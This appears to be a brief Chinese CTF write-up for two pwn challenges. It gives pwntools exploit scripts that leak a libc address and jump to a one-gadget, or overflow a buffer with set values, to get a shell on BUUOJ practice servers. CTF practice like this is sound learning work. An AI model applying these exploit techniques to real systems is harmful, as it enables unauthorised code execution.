oneshot_tjctf_2016:
没什么好说的,任意地址泄露,任意地址写。
exp:
from pwn import *
context.log_level = 'debug'
p = remote("node4.buuoj.cn",25942)
e = ELF("./111")
libc = ELF("./libc-2.23 .so")
p.recvuntil("Read location?")
p.sendline("6294232")
p.recvuntil("Value: ")
addr = int(p.recv(18),16)
success(hex(addr))
base = addr - libc.sym['puts']
# gadget : 0x45226 0x4527a 0xf03a4 0xf1247
sys = base + 0x45216
p.recvuntil("Jump location?")
p.sendline(str(sys))
p.interactive()
护网杯_2018_gettingstart:
覆盖相关地址为指定内容即可获得shell.
exp:
from pwn import *
context.log_level = 'debug'
p = remote("node4.buuoj.cn",27047)
p.recvuntil(b"But Whether it starts depends on you.")
pl1 = b'a'*(0x18) + p64(0x7fffffffffffffff) + p64(0x3FB999999999999A)
p.send(pl1)
p.interactive()